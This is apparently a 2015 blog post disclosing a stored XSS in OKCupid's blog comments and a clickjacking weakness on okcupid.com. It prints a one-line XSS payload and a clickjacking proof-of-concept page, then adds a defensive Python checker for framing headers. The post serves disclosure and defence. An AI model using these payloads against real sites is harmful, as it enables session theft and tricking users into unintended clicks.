Wednesday, 16 September 2015

OKCupid.com Security holes

1) Stored XSS

In their blog's comment section you could store XSS, and any user/admin who visited that blog post would get XSSed.
The PoC: break out of the input field, insert a non-existent image, and its onerror handler runs our script (which could steal session cookies etc.):
"><img src=x onerror=prompt(1);>

2) ClickJacking

POC:
<html>
  <head>
    <title>Clickjack test page</title>
  </head>
  <body>
  <style>
   iframe {
     position:absolute; /* needed for top/left to take effect */
     top:0; left:0;
     filter:alpha(opacity=50); /* in real life opacity=0 */
     opacity:1;
    }
  </style>
  <p>You've been clickjacked!</p>
    <iframe sandbox="allow-scripts allow-forms" src="http://okcupid.com"
       style="width:100%;height:90%">
    </iframe>
  </body>
</html>

What is clickjacking: www.owasp.org/index.php/Clickjacking
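Added here as a defender-side check and not part of the original post: a small Python script that reads a page's response headers and reports whether another site could frame it the way the test page above does. It checks CSP frame-ancestors first (browsers give it precedence) and falls back to X-Frame-Options; the sample header sets are constructed, not captured from okcupid.com.

```python
from typing import Optional

# Constructed sample responses (not captured from okcupid.com):
# header names are lower-cased, as most HTTP client libraries return them.
SAMPLE_RESPONSES = {
    "no_protection": {"content-type": "text/html"},
    "xfo_deny": {"x-frame-options": "DENY"},
    "xfo_sameorigin": {"x-frame-options": "SAMEORIGIN"},
    "csp_self": {"content-security-policy": "default-src 'self'; frame-ancestors 'self'"},
    "csp_none_overrides_xfo": {
        "x-frame-options": "ALLOWALL",  # not a valid value; CSP wins anyway
        "content-security-policy": "frame-ancestors 'none'",
    },
    "csp_without_frame_ancestors": {"content-security-policy": "script-src 'self'"},
}


def frame_ancestors(csp: str) -> Optional[list[str]]:
    """Return the source list of the frame-ancestors directive, or None if absent."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return parts[1:]
    return None


def framing_allowed(headers: dict) -> tuple[bool, str]:
    """Decide whether a third-party page may embed this response in an iframe.

    Returns (allowed, reason). CSP frame-ancestors takes precedence over
    X-Frame-Options in browsers that support it, so it is evaluated first.
    """
    csp = headers.get("content-security-policy", "")
    ancestors = frame_ancestors(csp) if csp else None
    if ancestors is not None:
        sources = [s.lower().strip("'") for s in ancestors]
        if sources == [] or sources == ["none"]:  # empty source list matches nothing
            return False, "CSP frame-ancestors 'none'"
        if "*" in sources or "http:" in sources or "https:" in sources:
            return True, "CSP frame-ancestors allows any origin"
        return False, "CSP frame-ancestors restricted to: " + ", ".join(sources)
    xfo = headers.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return False, f"X-Frame-Options {xfo}"
    if xfo.startswith("ALLOW-FROM"):
        # Obsolete directive, ignored by current browsers, so framing still works there.
        return True, "X-Frame-Options ALLOW-FROM is obsolete and ignored by current browsers"
    return True, "no X-Frame-Options and no CSP frame-ancestors"


if __name__ == "__main__":
    for name, headers in SAMPLE_RESPONSES.items():
        allowed, reason = framing_allowed(headers)
        print(f"{name:28s} framing {'ALLOWED' if allowed else 'blocked'}: {reason}")
```

Point it at live headers (e.g. from `requests.get(url).headers`, lower-casing the keys) to test a real page; a result of "ALLOWED" for a page with sensitive buttons or forms is the condition the clickjacking PoC above relies on.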